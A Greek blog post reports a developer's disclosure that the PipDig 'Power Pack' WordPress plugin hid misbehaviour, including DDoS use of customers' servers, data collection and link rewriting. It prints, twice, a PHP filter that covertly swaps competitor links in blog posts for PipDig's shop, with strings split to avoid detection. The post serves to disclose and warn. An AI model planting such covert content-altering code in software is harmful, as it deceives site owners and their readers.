Έχεις WordPress Theme από την PipDig; Ένα ενδιαφέρον εύρημα ασφάλειας δημοσιεύτηκε
Στις 29 Μαρτίου η Jem Turner, μια έμπειρη developer δημοσίευσε ένα ενδιαφέρον security εύρημα σχετικά με τα themes της εταιρείας PipDig. Η pipdig είναι μια γνωστή εταιρεία κατασκευής templates για τις πλατφόρμες της Blogger & του WordPress.
Στο άρθρο της δημοσιεύει τα ευρήματα της σχετικά με ένα απο τα wordpress templates της δημοφιλούς εταιρείας Pipdig.
Ένας πελάτης της Jem Turner, της έστειλε ένα μήνυμα σχετικά με μια περίεργη συμπεριφορά που εντόπισε στην wordpress σελίδα της.
Η ιστοσελίδα αργούσε πάρα πολύ, χωρίς κάποια εμφανής αιτία, οπότε η Jem αποφάσισε να ψάξει όσο πιο βαθιά μπορούσε στα logfiles του wordpress.
Ποιό είναι το ρίσκο για τους χρήστες:
Συγκεκριμένα αναφέρει πως η pipdig δημοσιεύει κακόβουλο κώδικα μέσω των themes της, χρησιμοποιώντας ένα plugin με την ονομασία “pipdig Power Pack” όπου εκτός από τις βασικές λειτουργίες του plugin επιπλέον εκτελεί τις παρακάτω ενέργειες :
- Χρησιμοποιεί servers από άλλους bloggers για ddos επιθέσεις.
- Αλλάζει το περιεχόμενο των links ενός blog post, προς ανταγωνιστικές εταιρείες έτσι ώστε να δείχνουν στην αρχική σελίδα της pipdig.
- Αντλεί πληροφορίες από τις ιστοσελίδες των blogger χωρίς την συναίνεση τους, παραβιάζοντας την gdpr νομοθεσία.
- Χρησιμοποιεί αυτά τα δεδομένα, όπου μεταξύ άλλων, μπορεί να πάρει πρόσβαση στις διαχειριστικές σελίδες των bloggers αλλάζοντας κωδικούς.
Παραδείγματα Κώδικα εντός του plugin:
[emphasis type=”info”]pipdig manipulating blogger content for links[/emphasis]function p3_content_filter($content) {if (get_transient(‘p3_news_new_user_wait’)) {
return $content;
} elseif (is_single()) {
$content = str_replace(‘bloger’.’ize.com’, ‘pipdig.co/shop/blogger-to-wordpress-m’.’igration/” data-scope=”‘, $content);
$content = str_replace(‘Blog’.’erize’, ‘Blog’.’ger to WordPress’, $content);
}
return $content;
}
add_filter(‘the_content’, ‘p3_content_filter’, 20);
Παραδείγματα Κώδικα εντός του plugin:
[emphasis type=”info”]pipdig manipulating blogger content for links[/emphasis]function p3_content_filter($content) {if (get_transient(‘p3_news_new_user_wait’)) {
return $content;
} elseif (is_single()) {
$content = str_replace(‘bloger’.’ize.com’, ‘pipdig.co/shop/blogger-to-wordpress-m’.’igration/” data-scope=”‘, $content);
$content = str_replace(‘Blog’.’erize’, ‘Blog’.’ger to WordPress’, $content);
}
return $content;
}
add_filter(‘the_content’, ‘p3_content_filter’, 20);
H Jem στο άρθρο της αναλύει και περιγράφει με λεπτομέρεια τα ευρήματα της και εξηγεί τις λειτουργίες του κακόβουλου κώδικα.
Αναφέρει επίσης πως πρίν δημοσιεύσει τα ευρήματα της, ζήτησε συμβουλές (νομικές ίσως) από έναν τρίτο συνεργάτη της, αλλά το ίδιο βράδυ η pipdig δημοσίευσε ένα update αφαιρώντας τον κακόβουλο κώδικα.
Προφανώς ο developer της pipdig θα είδε στα logfiles του, τα requests απο την Jem και έτσι αφαίρεσε οτιδήποτε σχετικό.
Η Jem έχει κρατήσει ένα backup του plugin και το δημοσιεύει στο άρθρο της. Μπορείτε να το κατεβάσετε αν θέλετε από εδώ.
Επειδή η pipdig χρησιμοποιεί έναν τρίτο φορέα για τα updates της, και δεν τα διανέμει μέσω του wordpress.org, θεωρητικά, μπορεί πάντα να δημοσιεύσει ένα update εφαρμόζοντας πάλι τον κακόβουλο κώδικα στο plugin/theme της.
Ο κακόβουλος κώδικας υπάρχει στις εκδόσεις έως και την 4.7.3, ενώ έχει αφαιρεθεί στην έκδοση 4.8.0 του powerpack plugin.
Links και πηγές άρθρων:
– Μπορείτε να δείτε το αρχικό άρθρο της της Jem Turner εδώ (ανοίγει σε νέο browser tab)
– Ποιά είναι η Jem Turner, δείτε το βιογραφικό της.
– Δεύτερη δημοσίευση σε μια πιό friendly μορφή εδώ.
– Τι απαντάει η PipDig. Δείτε την απάντηση στο blog τους εδώ.
– Το ίδιο εύρημα δημοσιεύτηκε και στο blog της Wordfence. Δείτε το εδώ
– H Wordfence αναλύει ακόμα περισσότερο τις πρακτικές που ακολούθησε η PipDig. Πως προσπάθησε να σβήσει τα ίχνη του κακόβουλου κώδικα.
Ενημερωθείτε απο το νέο άρθρο εδώ
